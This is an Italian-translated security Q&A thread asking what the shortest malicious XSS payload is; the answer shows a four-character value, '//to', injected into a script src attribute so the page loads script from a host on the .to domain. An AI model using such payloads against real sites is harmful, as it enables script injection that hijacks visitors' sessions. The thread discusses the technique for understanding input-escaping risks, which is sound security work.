Qual è l'XSS malintenzionato più breve possibile? [chiuso]

2

A volte inciampi su campi di input che non escono correttamente dall'input, ma che sembrano ancora troppo brevi per essere effettivamente usati per qualcosa di malevolo, almeno per qualcuno con la mia immaginazione limitata.

Questo mi ha fatto chiedere quale sia il campo di input più breve possibile da utilizzare per eseguire un XSS dannoso?

    
posta user1049697 01.12.2014 - 20:38
fonte

1 risposta

1

Dipende dal contesto.

Molto breve:

Context:

    <script src="%XSS%"></script>

Let's say you are the owner/maintainer/administrator of http://.to (Tonga gTLD).

    <script src="//to"></script>

XSS with 4 chars. Probably one of the shortest possible.

Ci sono dozzine di altri contesti.

Modifica:

Testato su Chrome 38.0.2125.122 (Mac OS X 10.8.5)

    
risposta data 02.12.2014 - 00:42
fonte

Leggi altre domande sui tag